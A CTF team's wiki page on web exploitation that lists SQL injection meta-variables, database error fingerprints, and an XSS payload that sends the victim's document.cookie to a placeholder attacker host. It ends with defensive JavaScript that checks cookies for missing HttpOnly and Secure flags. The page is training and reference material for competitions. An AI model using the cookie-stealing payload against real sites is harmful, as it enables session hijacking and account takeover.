Hexcellents CTF Wiki

Web related

General Stuff

  • Most web exploitation should be done in OWASP Mantra. This browser is a Firefox derivative that ships with many tools, plugins and add-ons integrated (with everything sanitized) to facilitate vulnerability finding.

SQLi

Scanners:

Meta-information variables:

  • @@datadir (MySQL)
  • @@version (MySQL / MS SQL)
  • user() (MySQL)
  • database() (MySQL)

Cheat sheet

  • XSS cookie stealing payload
  <script>
  function hack(){
     XSSImage=new Image;
     XSSImage.src="http://attacker's site.com/steal?stuff=" + document.cookie + "";
  }
  hack();
  </script>
  
  • Database error fingerprints:
    • “ORA-01756: quoted string not properly terminated” → Oracle
    • “Incorrect Syntax near ” → MSSQL
    • “You have an error in your SQL syntax” → MySQL
    • Hex error code → PostgreSQL
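
The XSS cookie stealing payload above only obtains cookies that `document.cookie` can read, that is, cookies set without the `HttpOnly` attribute. As an added example (not part of the original wiki; the header values and the list of sensitive cookie names are constructed assumptions), this checks a set of `Set-Cookie` headers for sensitive cookies that script can read:

```javascript
// Constructed sample Set-Cookie header values (not captured traffic).
const SAMPLE_HEADERS = [
  "PHPSESSID=abc123; Path=/",
  "auth=eyJ0eXAi; Path=/; Secure; HttpOnly; SameSite=Lax",
  "theme=dark; Path=/; Max-Age=31536000",
  "csrf=9f1c; Path=/; Secure; SameSite=Strict",
];

// Split one Set-Cookie value into the cookie name and a Map of attributes.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const first = parts.shift() || "";
  const eq = first.indexOf("=");
  const name = eq === -1 ? first : first.slice(0, eq);
  const attrs = new Map();
  for (const p of parts) {
    const i = p.indexOf("=");
    // Attribute names are case-insensitive, so normalise to lower case.
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    attrs.set(key, i === -1 ? true : p.slice(i + 1).trim());
  }
  return { name, attrs };
}

// Describe how each cookie is exposed. `sensitive` is a caller-supplied
// list of cookie names that carry session or auth state (an assumption).
function auditCookies(headers, sensitive = []) {
  return headers.map((h) => {
    const { name, attrs } = parseSetCookie(h);
    return {
      name,
      sensitive: sensitive.includes(name),
      scriptReadable: !attrs.has("httponly"), // visible in document.cookie
      sentOverHttp: !attrs.has("secure"), // also sent on unencrypted requests
    };
  });
}

// Names of sensitive cookies that injected script could read.
function exposedToScript(headers, sensitive = []) {
  return auditCookies(headers, sensitive)
    .filter((c) => c.sensitive && c.scriptReadable)
    .map((c) => c.name);
}

console.log(exposedToScript(SAMPLE_HEADERS, ["PHPSESSID", "auth", "csrf"]));
```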

Test setup

kb/web/home.txt · Last modified: 2013/10/15 22:28 by rcaragea